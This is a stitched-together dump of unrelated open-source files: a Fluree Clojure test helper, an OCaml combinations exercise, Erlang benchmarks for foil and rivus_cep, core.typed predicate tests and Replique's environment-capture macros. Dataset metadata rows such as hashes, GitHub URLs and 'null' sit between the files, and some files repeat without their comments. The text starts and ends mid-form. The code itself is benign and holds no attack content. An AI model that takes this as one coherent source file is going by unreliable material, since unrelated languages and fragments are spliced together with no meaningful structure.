:collectionDefault true
:fns [["_fn/name" "true"]]
:ops ["all"]}
{:_id "_rule$noHandles"
:id "noHandles"
:collection "person"
:predicates ["person/handle"]
:fns [["_fn/name" "false"]]
:ops ["all"]}]]
[keys (->> add-auth
(fdb/transact-async conn ledger)
<!!)])))
(defn create-temp-dir ^File
[]
(let [base-dir (io/file (System/getProperty "java.io.tmpdir"))
dir-path (io/file base-dir (str (System/currentTimeMillis) "-"
(long (rand 10000000000000))))]
(if (.mkdirs dir-path)
dir-path
(throw (ex-info "Failed to create temp directory"
{:dir-path dir-path})))))
(defn assert-success
[result]
(if (instance? Throwable result)
(throw result)
result))
(defn printlnn
[& s]
(apply println (concat s ["\n"])))
(defn ^:deprecated test-system-deprecated
"This fixture is deprecated. As tests are converted to the more idiomatic
approach, use the new test-system :once fixture w/ rand-ledger calls in each
test instead."
([f]
(test-system-deprecated {} f))
([opts f]
(try
(do (start opts)
(wait-for-system-ready init-timeout-ms)
(init-ledgers!)
(f))
:success
(catch Exception e
(log/error e "Caught test exception")
e)
(finally (stop)))))
(defn safe-Throwable->map [v]
(if (isa? (class v) Throwable)
(Throwable->map v)
(do
(println "Not a throwable:" (pr-str v))
v)))
(defn extract-errors [v]
(if (isa? (class v) Throwable)
(or (some-> (ex-data v) (assoc :message (ex-message v)))
(Throwable->map v))
(do
(println "Not a throwable:" (pr-str v))
v)))
(defn get-tempid-count
"Returns count of tempids within a collection, given the tempid map from the returned transaction
and a collection name."
[tempids collection]
(let [collection-tempids (get tempids collection)]
(when-not (sequential? collection-tempids)
(throw (ex-info (str "Unable to get collection range from tempid map for: " collection)
{:tempids tempids
:collection collection})))
(let [[start-sid end-sid] collection-tempids]
(inc (- end-sid start-sid)))))
(defn contains-every?
"Returns true if and only if map m contains every key supplied in subsequent
args ks. Uses (contains? m k) so the same semantics apply (e.g. checks for
map keys not values).
NB: This is NOT the same as set equality. It checks that the set contents of
m is a (non-strict) superset of ks. In other words, m can have more than ks,
but must have all of ks."
[m & ks]
(every? #(contains? m %) ks))
|
e87e659c8aef844a6fd66f4786baeba44c2e090baa92e24ffc8dcbfa832fe38f | kaznum/programming_in_ocaml_exercise | comb.ml | let rec comb (n, m) =
if m = 0 || m = n then 1
else
comb(n - 1, m) + comb(n - 1, m - 1);;
| null | https://raw.githubusercontent.com/kaznum/programming_in_ocaml_exercise/6f6a5d62a7a87a1c93561db88f08ae4e445b7d4e/ex3.11/comb.ml | ocaml | let rec comb (n, m) =
if m = 0 || m = n then 1
else
comb(n - 1, m) + comb(n - 1, m - 1);;
| |
f0a5dec0040ba600a8aff1d88d6dfa6629085012e7b395c52a230eea6a39033a | lpgauth/foil | foil_bench.erl | -module(foil_bench).
-export([
run/0
]).
-define(B, 1000). % batch size
-define(C, 2048). % concurrency
-define(N, 2048). % iterations
-define(T, [
{atom, test},
{binary, <<0:1024>>},
{complex, {test, [<<"test">>, "test"]}},
{list, "test"},
{tuple, {test, test2}}
]).
%% public
-spec run() ->
ok.
run() ->
error_logger:tty(false),
foil_app:start(),
io:format("~23s ~6s ~6s ~6s~n", [name, mean, p99, p999]),
run(?T, ?C, ?N),
foil_app:stop().
%% private
lookup(Key, List) ->
case lists:keyfind(Key, 1, List) of
false -> undefined;
{_, Value} -> Value
end.
name(Name, Type) ->
list_to_atom(atom_to_list(Name) ++ "_" ++ atom_to_list(Type)).
run([], _C, _N) ->
ok;
run([{Type, Value} | T], C, N) ->
run_ets(Type, Value, C, N),
run_foil_indirect(Type, Value, C, N),
run_foil_direct(Type, Value, C, N),
run(T, C, N).
run(Name, Fun, C, N) ->
[Fun() || _ <- lists:seq(1, 10000)],
Results = timing_hdr:run(Fun, [
{name, Name},
{concurrency, C},
{iterations, N},
{output, "output/" ++ atom_to_list(Name)}
]),
Mean = lookup(mean, Results) / ?B,
P99 = lookup(p99, Results) / ?B,
P999 = lookup(p999, Results) / ?B,
io:format("~23s ~6.3f ~6.3f ~6.3f~n", [Name, Mean, P99, P999]).
run_ets(Type, Value, C, N) ->
ets:new(?MODULE, [named_table, public, {read_concurrency, true}]),
[ets:insert(?MODULE, {X, <<"foo">>}) || X <- lists:seq(0, 100)],
ets:insert(?MODULE, {test, Value}),
Fun = fun() ->
[Value = ets:lookup_element(?MODULE, test, 2) || _ <- lists:seq(0, ?B)],
ok
end,
run(name(ets, Type), Fun, C, N),
ets:delete(?MODULE).
run_foil_direct(Type, Value, C, N) ->
foil:new(?MODULE),
[foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
foil:insert(?MODULE, test, Value),
foil:load(?MODULE),
timer:sleep(500),
Fun = fun() ->
[{ok, Value} = foil_bench_foil:lookup(test) || _ <- lists:seq(0, ?B)],
ok
end,
run(name(foil_direct, Type), Fun, C, N),
foil:delete(?MODULE).
run_foil_indirect(Type, Value, C, N) ->
foil:new(?MODULE),
[foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
foil:insert(?MODULE, test, Value),
foil:load(?MODULE),
timer:sleep(500),
Fun = fun() ->
[{ok, Value} = foil:lookup(?MODULE, test) || _ <- lists:seq(0, ?B)],
ok
end,
run(name(foil_indirect, Type), Fun, C, N),
foil:delete(?MODULE).
| null | https://raw.githubusercontent.com/lpgauth/foil/e462829855a745d8f20fb0508ae3eb8e323b03bd/test/foil_bench.erl | erlang | batch size
concurrency
iterations
public
private | -module(foil_bench).
-export([
run/0
]).
-define(T, [
{atom, test},
{binary, <<0:1024>>},
{complex, {test, [<<"test">>, "test"]}},
{list, "test"},
{tuple, {test, test2}}
]).
-spec run() ->
ok.
run() ->
error_logger:tty(false),
foil_app:start(),
io:format("~23s ~6s ~6s ~6s~n", [name, mean, p99, p999]),
run(?T, ?C, ?N),
foil_app:stop().
lookup(Key, List) ->
case lists:keyfind(Key, 1, List) of
false -> undefined;
{_, Value} -> Value
end.
name(Name, Type) ->
list_to_atom(atom_to_list(Name) ++ "_" ++ atom_to_list(Type)).
run([], _C, _N) ->
ok;
run([{Type, Value} | T], C, N) ->
run_ets(Type, Value, C, N),
run_foil_indirect(Type, Value, C, N),
run_foil_direct(Type, Value, C, N),
run(T, C, N).
run(Name, Fun, C, N) ->
[Fun() || _ <- lists:seq(1, 10000)],
Results = timing_hdr:run(Fun, [
{name, Name},
{concurrency, C},
{iterations, N},
{output, "output/" ++ atom_to_list(Name)}
]),
Mean = lookup(mean, Results) / ?B,
P99 = lookup(p99, Results) / ?B,
P999 = lookup(p999, Results) / ?B,
io:format("~23s ~6.3f ~6.3f ~6.3f~n", [Name, Mean, P99, P999]).
run_ets(Type, Value, C, N) ->
ets:new(?MODULE, [named_table, public, {read_concurrency, true}]),
[ets:insert(?MODULE, {X, <<"foo">>}) || X <- lists:seq(0, 100)],
ets:insert(?MODULE, {test, Value}),
Fun = fun() ->
[Value = ets:lookup_element(?MODULE, test, 2) || _ <- lists:seq(0, ?B)],
ok
end,
run(name(ets, Type), Fun, C, N),
ets:delete(?MODULE).
run_foil_direct(Type, Value, C, N) ->
foil:new(?MODULE),
[foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
foil:insert(?MODULE, test, Value),
foil:load(?MODULE),
timer:sleep(500),
Fun = fun() ->
[{ok, Value} = foil_bench_foil:lookup(test) || _ <- lists:seq(0, ?B)],
ok
end,
run(name(foil_direct, Type), Fun, C, N),
foil:delete(?MODULE).
run_foil_indirect(Type, Value, C, N) ->
foil:new(?MODULE),
[foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
foil:insert(?MODULE, test, Value),
foil:load(?MODULE),
timer:sleep(500),
Fun = fun() ->
[{ok, Value} = foil:lookup(?MODULE, test) || _ <- lists:seq(0, ?B)],
ok
end,
run(name(foil_indirect, Type), Fun, C, N),
foil:delete(?MODULE).
|
3c443843b60b492a2e174bba1db9b90992cb8a98886207a9639b2bbad2264d35 | vascokk/rivus_cep | basho_bench_driver_rivus.erl | -module(basho_bench_driver_rivus).
-compile([{parse_transform, lager_transform}]).
-export([new/1, run/4]).
-include("basho_bench.hrl").
-record(state, {
host,
port,
socket,
client_num
}).
new(Id) ->
{Host, Port, Socket} = connect(),
deploy_queries(Socket, Id),
{ok, #state{
host = Host,
port = Port,
socket = Socket,
client_num = Id}}.
%% new(_Id) ->
%% {Host, Port, Socket} = connect(),
%%
%% {ok, #state{
%% host = Host,
%% port = Port,
%% socket = Socket}}.
connect() ->
{Host, Port} = basho_bench_config:get(rivus_cep_tcp_serv),
{ok, Socket} = gen_tcp:connect(Host, Port, [{active, false}, {nodelay, true}, {packet, 4}, binary]),
{Host, Port, Socket}.
deploy_queries(Socket, Id) ->
Queries = basho_bench_config:get(rivus_cep_queries, []),
lists:foreach(fun({Type, Query}) ->
Q = re:replace(Query,"\\$",integer_to_list(Id),[global, {return,list}]),
lager:info("Deploying query type: ~p, client: ~p, stmt: ~p", [Type, Id, Q]),
execute(Type, Q, Socket) end, Queries).
execute(query, Query, Socket) ->
ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_test], [], []}}));
execute(event, Query, Socket) ->
ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_event], [], []}})).
send_event(Event, #state{socket = Socket} = State) ->
case gen_tcp:send(Socket, term_to_binary({event, benchmark_test, Event})) of
ok -> {ok, State};
Error -> Error
end.
create_event(_KeyGen, ValueGen) ->
ValueGen.
run(notify, KeyGen, ValueGen, #state{socket = Socket} = State) ->
Event = create_event(KeyGen, ValueGen),
% Send message
case send_event(Event, State) of
{error, E} ->
{error, E, State};
{ok, State} -> case gen_tcp:recv(Socket,0) of
{ok, _} -> {ok, State};
{error, E} -> {error, E, State}
end
end.
| null | https://raw.githubusercontent.com/vascokk/rivus_cep/e9fe6ed79201d852065f7fb2a24a880414031d27/priv/basho_bench_driver_rivus.erl | erlang | new(_Id) ->
{Host, Port, Socket} = connect(),
{ok, #state{
host = Host,
port = Port,
socket = Socket}}.
Send message | -module(basho_bench_driver_rivus).
-compile([{parse_transform, lager_transform}]).
-export([new/1, run/4]).
-include("basho_bench.hrl").
-record(state, {
host,
port,
socket,
client_num
}).
new(Id) ->
{Host, Port, Socket} = connect(),
deploy_queries(Socket, Id),
{ok, #state{
host = Host,
port = Port,
socket = Socket,
client_num = Id}}.
connect() ->
{Host, Port} = basho_bench_config:get(rivus_cep_tcp_serv),
{ok, Socket} = gen_tcp:connect(Host, Port, [{active, false}, {nodelay, true}, {packet, 4}, binary]),
{Host, Port, Socket}.
deploy_queries(Socket, Id) ->
Queries = basho_bench_config:get(rivus_cep_queries, []),
lists:foreach(fun({Type, Query}) ->
Q = re:replace(Query,"\\$",integer_to_list(Id),[global, {return,list}]),
lager:info("Deploying query type: ~p, client: ~p, stmt: ~p", [Type, Id, Q]),
execute(Type, Q, Socket) end, Queries).
execute(query, Query, Socket) ->
ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_test], [], []}}));
execute(event, Query, Socket) ->
ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_event], [], []}})).
send_event(Event, #state{socket = Socket} = State) ->
case gen_tcp:send(Socket, term_to_binary({event, benchmark_test, Event})) of
ok -> {ok, State};
Error -> Error
end.
create_event(_KeyGen, ValueGen) ->
ValueGen.
run(notify, KeyGen, ValueGen, #state{socket = Socket} = State) ->
Event = create_event(KeyGen, ValueGen),
case send_event(Event, State) of
{error, E} ->
{error, E, State};
{ok, State} -> case gen_tcp:recv(Socket,0) of
{ok, _} -> {ok, State};
{error, E} -> {error, E, State}
end
end.
|
734536ed465573f1dabb699d15e4b9b7060a95bc9329c575d74c75f8b19dd39f | typedclojure/typedclojure | pred.clj | (ns clojure.core.typed.test.pred
(:require
[clojure.test :refer :all]
[clojure.core.typed :as t]))
(def Number? (t/pred Number))
(t/defalias NumberAlias
Number)
(deftest class-pred-test
(is (Number? 1))
(is (not (Number? nil))))
(deftest hmap-pred-test
(is ((every-pred
(t/pred
(t/HMap)))
{}
{:a 'blah}))
(is ((complement
(t/pred
(t/HMap :mandatory {:a Number})))
{}))
(is ((t/pred
(t/HMap :mandatory {:a Number}))
{:a 1}))
(is ((every-pred
(t/pred
(t/HMap :optional {:a Number})))
{:a 1}
{}
{:b 'a}))
(is ((every-pred
(t/pred
(t/HMap :absent-keys #{:a})))
{:b 'a}))
(is (not
((every-pred
(t/pred
(t/HMap :absent-keys #{:a})))
{:a 'a})))
)
(deftest hvec-pred-test
(is ((t/pred '[Number Number])
[1 2]))
(is ((every-pred
(complement
(t/pred '[Number Number])))
['a 2]
[]
[1]
[1 2 3]))
(is ((every-pred
(t/pred
'[Number Number Number *]))
[1 2]
[1 2 3]
[1 2 3 4 5 6 6 7 4 2 1]))
(is ((every-pred
(t/pred
'[Number Number Number :*]))
[1 2]
[1 2 3]
[1 2 3 4 5 6 6 7 4 2 1]))
(is ((every-pred
(complement
(t/pred
'[Number Number Number *])))
[]
[1]
[1 2 'a]
[1 2 3 4 5 'a 6 7 4 2 1])))
(deftest rec-pred-test
(is ((every-pred
(t/pred (t/Rec [x] (t/U '[x] Number))))
1
'[1]
'[[1]]
'[[[[[2.2]]]]]))
(is ((every-pred
(t/pred (t/Rec [x] (t/U '{:a x} Number))))
1
'{:a 1}
'{:a {:a 1}}
'{:a {:a {:a {:a {:a 1}}}}}))
(is ((every-pred
(complement
(t/pred (t/Rec [x] (t/U '[x] Number)))))
'[1 1]
'[[1] [1]])))
(deftest singleton-pred-test
(is ((t/pred true)
true))
(is ((t/pred (t/Value true))
true))
(is ((t/pred false)
false))
(is ((t/pred (t/Value false))
false))
(is ((t/pred 'sym)
'sym))
(is ((t/pred (t/Value sym))
'sym))
(is ((t/pred ':sym)
':sym))
(is ((t/pred (t/Value :sym))
':sym))
(is ((t/pred nil)
nil))
(is ((t/pred (t/Value nil))
nil))
(is ((t/pred '1)
1))
(is ((every-pred
(complement
(t/pred '1)))
1.0))
(is ((t/pred (t/Value 1))
1)))
(deftest countrange-pred-test
(is ((every-pred
(t/pred (t/CountRange 0)))
nil
[]
{}
'()))
(is ((every-pred
(complement
(t/pred (t/CountRange 0))))
; only supports clojure collections
(into-array [])
)))
(deftest intersect-pred-test
(is ((every-pred
(t/pred (t/I Number Long)))
1))
(is ((every-pred
(complement
(t/pred (t/I Number Long))))
1.1))
(is ((every-pred
(complement
(t/pred (t/I Number Long))))
1.1)))
(deftest union-pred-test
(is ((every-pred
(t/pred (t/U Number Long)))
1
1.1))
(is ((every-pred
(complement
(t/pred (t/U Number Long))))
'a))
(is ((every-pred
(complement
(t/pred t/Nothing))
(complement
(t/pred (t/U))))
'a)))
(deftest tfn-name-test
(is ((every-pred
(t/pred (clojure.core.typed/Option Number)))
nil
1
1.1)))
(deftest iseq-pred-test
(is ((every-pred
(t/pred (t/Seq Number)))
'(1 2)))
(is ((every-pred
(complement
(t/pred (t/Seq Number))))
[1 2])))
(deftest any-pred-test
(is ((every-pred
(t/pred t/Any))
1 2 nil [1])))
| null | https://raw.githubusercontent.com/typedclojure/typedclojure/3aa381a764df3cc39dc0a312a1d9823eb6b7c564/typed/clj.checker/test/clojure/core/typed/test/pred.clj | clojure | only supports clojure collections | (ns clojure.core.typed.test.pred
(:require
[clojure.test :refer :all]
[clojure.core.typed :as t]))
(def Number? (t/pred Number))
(t/defalias NumberAlias
Number)
(deftest class-pred-test
(is (Number? 1))
(is (not (Number? nil))))
(deftest hmap-pred-test
(is ((every-pred
(t/pred
(t/HMap)))
{}
{:a 'blah}))
(is ((complement
(t/pred
(t/HMap :mandatory {:a Number})))
{}))
(is ((t/pred
(t/HMap :mandatory {:a Number}))
{:a 1}))
(is ((every-pred
(t/pred
(t/HMap :optional {:a Number})))
{:a 1}
{}
{:b 'a}))
(is ((every-pred
(t/pred
(t/HMap :absent-keys #{:a})))
{:b 'a}))
(is (not
((every-pred
(t/pred
(t/HMap :absent-keys #{:a})))
{:a 'a})))
)
(deftest hvec-pred-test
(is ((t/pred '[Number Number])
[1 2]))
(is ((every-pred
(complement
(t/pred '[Number Number])))
['a 2]
[]
[1]
[1 2 3]))
(is ((every-pred
(t/pred
'[Number Number Number *]))
[1 2]
[1 2 3]
[1 2 3 4 5 6 6 7 4 2 1]))
(is ((every-pred
(t/pred
'[Number Number Number :*]))
[1 2]
[1 2 3]
[1 2 3 4 5 6 6 7 4 2 1]))
(is ((every-pred
(complement
(t/pred
'[Number Number Number *])))
[]
[1]
[1 2 'a]
[1 2 3 4 5 'a 6 7 4 2 1])))
(deftest rec-pred-test
(is ((every-pred
(t/pred (t/Rec [x] (t/U '[x] Number))))
1
'[1]
'[[1]]
'[[[[[2.2]]]]]))
(is ((every-pred
(t/pred (t/Rec [x] (t/U '{:a x} Number))))
1
'{:a 1}
'{:a {:a 1}}
'{:a {:a {:a {:a {:a 1}}}}}))
(is ((every-pred
(complement
(t/pred (t/Rec [x] (t/U '[x] Number)))))
'[1 1]
'[[1] [1]])))
(deftest singleton-pred-test
(is ((t/pred true)
true))
(is ((t/pred (t/Value true))
true))
(is ((t/pred false)
false))
(is ((t/pred (t/Value false))
false))
(is ((t/pred 'sym)
'sym))
(is ((t/pred (t/Value sym))
'sym))
(is ((t/pred ':sym)
':sym))
(is ((t/pred (t/Value :sym))
':sym))
(is ((t/pred nil)
nil))
(is ((t/pred (t/Value nil))
nil))
(is ((t/pred '1)
1))
(is ((every-pred
(complement
(t/pred '1)))
1.0))
(is ((t/pred (t/Value 1))
1)))
(deftest countrange-pred-test
(is ((every-pred
(t/pred (t/CountRange 0)))
nil
[]
{}
'()))
(is ((every-pred
(complement
(t/pred (t/CountRange 0))))
(into-array [])
)))
(deftest intersect-pred-test
(is ((every-pred
(t/pred (t/I Number Long)))
1))
(is ((every-pred
(complement
(t/pred (t/I Number Long))))
1.1))
(is ((every-pred
(complement
(t/pred (t/I Number Long))))
1.1)))
(deftest union-pred-test
(is ((every-pred
(t/pred (t/U Number Long)))
1
1.1))
(is ((every-pred
(complement
(t/pred (t/U Number Long))))
'a))
(is ((every-pred
(complement
(t/pred t/Nothing))
(complement
(t/pred (t/U))))
'a)))
(deftest tfn-name-test
(is ((every-pred
(t/pred (clojure.core.typed/Option Number)))
nil
1
1.1)))
(deftest iseq-pred-test
(is ((every-pred
(t/pred (t/Seq Number)))
'(1 2)))
(is ((every-pred
(complement
(t/pred (t/Seq Number))))
[1 2])))
(deftest any-pred-test
(is ((every-pred
(t/pred t/Any))
1 2 nil [1])))
|
ec4504097241d5654f4285813c10ec23d49680f3654288e83e55f5e78cd8136f | EwenG/replique | omniscient.clj | (ns replique.omniscient
(:require [replique.utils :as utils]
[replique.environment :as env]
[replique.omniscient-runtime]
[replique.elisp-printer :as elisp]
[replique.meta]
[replique.watch :as watch]))
(def ^:private cljs-compiler-env (utils/dynaload 'replique.repl-cljs/compiler-env))
(def ^:private cljs-eval-cljs-form (utils/dynaload 'replique.repl-cljs/eval-cljs-form))
(def ^:private cljs-evaluate-form (utils/dynaload 'replique.repl-cljs/-evaluate-form))
(def ^:private cljs-munged (utils/dynaload 'cljs.compiler/munge))
;; clojure.core/*data-readers* clojure.core/*default-data-reader-fn*
;; Prevent dynamic vars used by the REPL/system from beeing captured
(def excluded-dyn-vars #{'clojure.core/*3 'clojure.core/*print-meta* 'clojure.core/*print-namespace-maps* 'clojure.core/*file* 'clojure.core/*command-line-args* 'clojure.core/*2 'clojure.core/*err* 'clojure.core/*print-length* 'clojure.core/*math-context* 'clojure.core/*e 'clojure.core/*1 'clojure.core/*source-path* 'clojure.core/*unchecked-math* 'clojure.spec/*explain-out* 'clojure.core/*in* 'clojure.core/*print-level* 'clojure.core/*warn-on-reflection* 'clojure.core/*out* 'clojure.core/*assert* 'clojure.core/*read-eval* 'clojure.core/*ns* 'clojure.core/*compile-path* 'clojure.core.server/*session* 'clojure.spec.alpha/*explain-out* 'clojure.core/pr 'replique.watch/*printed* 'replique.watch/*results* 'replique.omniscient-runtime/*captured-envs*})
(defn generated-local? [local]
(re-matches #"^(vec__|map__|seq__|first__|p__)[0-9]+$" (str local)))
(defn env->locals [env]
(let [locals (if (utils/cljs-env? env)
(:locals env) env)]
(->> (keys locals)
(remove generated-local?)
(into []))))
(defn locals-map [locals]
(zipmap (map (partial list 'quote) locals) locals))
(defn dynamic-bindings-clj []
`(reduce-kv
(partial replique.omniscient-runtime/dynamic-bindings-clj-reducer excluded-dyn-vars)
{} (get-thread-bindings)))
(defn ns-map-filter-dynamic [ns-map]
(filter (fn [[k v]] (:dynamic v)) ns-map))
(defn dyn-vars [comp-env ns]
(let [uses (->> (select-keys ns [:uses :renames])
vals
(map (partial env/cljs-ns-map-resolve comp-env))
(map ns-map-filter-dynamic))
defs (->> (select-keys ns [:defs])
vals
(map ns-map-filter-dynamic))]
(->> (concat uses defs)
(into {}))))
(defn dynamic-bindings-cljs [comp-env ns]
(let [dyn-vars (->> (dyn-vars comp-env ns)
(map (comp :name second))
(remove (partial contains? excluded-dyn-vars)))]
(zipmap (map (fn [x] `(quote ~x)) dyn-vars) dyn-vars)))
(defn dynamic-bindings [env]
(if (utils/cljs-env? env)
(dynamic-bindings-cljs (env/->CljsCompilerEnv @@cljs-compiler-env) (:ns env))
(dynamic-bindings-clj)))
(defn safe-ns-resolve [comp-env ns sym]
(try (env/ns-resolve comp-env ns sym)
(catch ClassNotFoundException e nil)))
(defn capture-env [env form capture-atom body]
(let [{:keys [file line column] :or {file *file*}} (meta form)
position-str (str file ":" line ":" column)]
`(let [captured-env# ~{:locals (locals-map (env->locals env))
;; exclude dynamic vars that are used by the REPL/system
:bindings (dynamic-bindings env)
:position position-str}
[result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
[(do ~@body)
replique.omniscient-runtime/*captured-envs*])]
(let [captured-env# (if (seq captured-envs#)
(assoc captured-env# :child-envs captured-envs#)
captured-env#)]
(reset! ~capture-atom captured-env#))
result#)))
(defn capture-child-env [env form body]
(let [{:keys [file line column] :or {file *file*}} (meta form)
position-str (str file ":" line ":" column)]
`(let [captured-env# ~{:locals (locals-map (env->locals env))
;; exclude dynamic vars that are used by the REPL/system
:bindings (dynamic-bindings env)
:position position-str}
[result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
[(do ~@body)
replique.omniscient-runtime/*captured-envs*])]
(when (some? replique.omniscient-runtime/*captured-envs*)
(let [captured-env# (if (seq captured-envs#)
(assoc captured-env# :child-envs captured-envs#)
captured-env#)]
(set! replique.omniscient-runtime/*captured-envs*
(conj replique.omniscient-runtime/*captured-envs* captured-env#))))
result#)))
(defn get-binding-syms [env capture-atom]
(if (utils/cljs-env? env)
(let [res (@cljs-eval-cljs-form (:repl-env env)
`(replique.omniscient-runtime/get-binding-syms ~capture-atom))]
(read-string (read-string res)))
(replique.omniscient-runtime/get-binding-syms capture-atom)))
(defn bindings-reducer [capture-atom acc binding-sym]
(conj acc binding-sym
`(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
:bindings (get (quote ~binding-sym)))))
(defn locals-reducer [capture-atom acc local-sym]
(conj acc local-sym
`(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
:locals (get (quote ~local-sym)))))
(defn with-env [env capture-atom body]
;; :repl-env may be nil when compiling files
(when-not (and (utils/cljs-env? env) (nil? (:repl-env env)))
(let [syms (get-binding-syms env capture-atom)
locals-syms (:locals syms)
binding-syms (:bindings syms)]
`(binding ~(reduce (partial bindings-reducer capture-atom)
[] binding-syms)
(let ~(reduce (partial locals-reducer capture-atom)
[] locals-syms)
~@body)))))
(defn captured-env-locals [comp-env ns captured-env]
(let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
(env/find-ns comp-env (env/default-ns comp-env)))
resolved (when capture-env
(safe-ns-resolve comp-env ns (symbol captured-env)))]
(when resolved
(replique.omniscient-runtime/get-locals @resolved))))
(defn captured-env-locals-cljs [comp-env repl-env ns captured-env]
(let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
(env/find-ns comp-env (env/default-ns comp-env)))
resolved (when capture-env
(safe-ns-resolve comp-env ns (symbol captured-env)))]
(when (:name resolved)
(let [{:keys [status value]} (@cljs-evaluate-form
repl-env
(format "replique.omniscient_runtime.get_locals(%s);"
(@cljs-munged (str (:name resolved))))
:timeout-before-submitted 100)]
(when (= :success status)
(elisp/->ElispString value))))))
(comment
(def env (atom nil))
(let [eeee 44]
(replique.interactive/capture-env env
44))
(replique.interactive/with-env env
eeee)
)
| null | https://raw.githubusercontent.com/EwenG/replique/45719ec95f463107f4c4ca79b7f83a7882b450cb/src/replique/omniscient.clj | clojure | clojure.core/*data-readers* clojure.core/*default-data-reader-fn*
Prevent dynamic vars used by the REPL/system from beeing captured
exclude dynamic vars that are used by the REPL/system
exclude dynamic vars that are used by the REPL/system
:repl-env may be nil when compiling files | (ns replique.omniscient
(:require [replique.utils :as utils]
[replique.environment :as env]
[replique.omniscient-runtime]
[replique.elisp-printer :as elisp]
[replique.meta]
[replique.watch :as watch]))
(def ^:private cljs-compiler-env (utils/dynaload 'replique.repl-cljs/compiler-env))
(def ^:private cljs-eval-cljs-form (utils/dynaload 'replique.repl-cljs/eval-cljs-form))
(def ^:private cljs-evaluate-form (utils/dynaload 'replique.repl-cljs/-evaluate-form))
(def ^:private cljs-munged (utils/dynaload 'cljs.compiler/munge))
(def excluded-dyn-vars #{'clojure.core/*3 'clojure.core/*print-meta* 'clojure.core/*print-namespace-maps* 'clojure.core/*file* 'clojure.core/*command-line-args* 'clojure.core/*2 'clojure.core/*err* 'clojure.core/*print-length* 'clojure.core/*math-context* 'clojure.core/*e 'clojure.core/*1 'clojure.core/*source-path* 'clojure.core/*unchecked-math* 'clojure.spec/*explain-out* 'clojure.core/*in* 'clojure.core/*print-level* 'clojure.core/*warn-on-reflection* 'clojure.core/*out* 'clojure.core/*assert* 'clojure.core/*read-eval* 'clojure.core/*ns* 'clojure.core/*compile-path* 'clojure.core.server/*session* 'clojure.spec.alpha/*explain-out* 'clojure.core/pr 'replique.watch/*printed* 'replique.watch/*results* 'replique.omniscient-runtime/*captured-envs*})
(defn generated-local? [local]
(re-matches #"^(vec__|map__|seq__|first__|p__)[0-9]+$" (str local)))
(defn env->locals [env]
(let [locals (if (utils/cljs-env? env)
(:locals env) env)]
(->> (keys locals)
(remove generated-local?)
(into []))))
(defn locals-map [locals]
(zipmap (map (partial list 'quote) locals) locals))
(defn dynamic-bindings-clj []
`(reduce-kv
(partial replique.omniscient-runtime/dynamic-bindings-clj-reducer excluded-dyn-vars)
{} (get-thread-bindings)))
(defn ns-map-filter-dynamic [ns-map]
(filter (fn [[k v]] (:dynamic v)) ns-map))
(defn dyn-vars [comp-env ns]
(let [uses (->> (select-keys ns [:uses :renames])
vals
(map (partial env/cljs-ns-map-resolve comp-env))
(map ns-map-filter-dynamic))
defs (->> (select-keys ns [:defs])
vals
(map ns-map-filter-dynamic))]
(->> (concat uses defs)
(into {}))))
(defn dynamic-bindings-cljs [comp-env ns]
(let [dyn-vars (->> (dyn-vars comp-env ns)
(map (comp :name second))
(remove (partial contains? excluded-dyn-vars)))]
(zipmap (map (fn [x] `(quote ~x)) dyn-vars) dyn-vars)))
(defn dynamic-bindings [env]
(if (utils/cljs-env? env)
(dynamic-bindings-cljs (env/->CljsCompilerEnv @@cljs-compiler-env) (:ns env))
(dynamic-bindings-clj)))
(defn safe-ns-resolve [comp-env ns sym]
(try (env/ns-resolve comp-env ns sym)
(catch ClassNotFoundException e nil)))
(defn capture-env [env form capture-atom body]
(let [{:keys [file line column] :or {file *file*}} (meta form)
position-str (str file ":" line ":" column)]
`(let [captured-env# ~{:locals (locals-map (env->locals env))
:bindings (dynamic-bindings env)
:position position-str}
[result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
[(do ~@body)
replique.omniscient-runtime/*captured-envs*])]
(let [captured-env# (if (seq captured-envs#)
(assoc captured-env# :child-envs captured-envs#)
captured-env#)]
(reset! ~capture-atom captured-env#))
result#)))
(defn capture-child-env [env form body]
(let [{:keys [file line column] :or {file *file*}} (meta form)
position-str (str file ":" line ":" column)]
`(let [captured-env# ~{:locals (locals-map (env->locals env))
:bindings (dynamic-bindings env)
:position position-str}
[result# captured-envs#] (binding [replique.omniscient-runtime/*captured-envs* []]
[(do ~@body)
replique.omniscient-runtime/*captured-envs*])]
(when (some? replique.omniscient-runtime/*captured-envs*)
(let [captured-env# (if (seq captured-envs#)
(assoc captured-env# :child-envs captured-envs#)
captured-env#)]
(set! replique.omniscient-runtime/*captured-envs*
(conj replique.omniscient-runtime/*captured-envs* captured-env#))))
result#)))
(defn get-binding-syms [env capture-atom]
(if (utils/cljs-env? env)
(let [res (@cljs-eval-cljs-form (:repl-env env)
`(replique.omniscient-runtime/get-binding-syms ~capture-atom))]
(read-string (read-string res)))
(replique.omniscient-runtime/get-binding-syms capture-atom)))
(defn bindings-reducer [capture-atom acc binding-sym]
(conj acc binding-sym
`(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
:bindings (get (quote ~binding-sym)))))
(defn locals-reducer [capture-atom acc local-sym]
(conj acc local-sym
`(-> (replique.omniscient-runtime/capture-env-var-value ~capture-atom)
:locals (get (quote ~local-sym)))))
(defn with-env [env capture-atom body]
(when-not (and (utils/cljs-env? env) (nil? (:repl-env env)))
(let [syms (get-binding-syms env capture-atom)
locals-syms (:locals syms)
binding-syms (:bindings syms)]
`(binding ~(reduce (partial bindings-reducer capture-atom)
[] binding-syms)
(let ~(reduce (partial locals-reducer capture-atom)
[] locals-syms)
~@body)))))
(defn captured-env-locals [comp-env ns captured-env]
(let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
(env/find-ns comp-env (env/default-ns comp-env)))
resolved (when capture-env
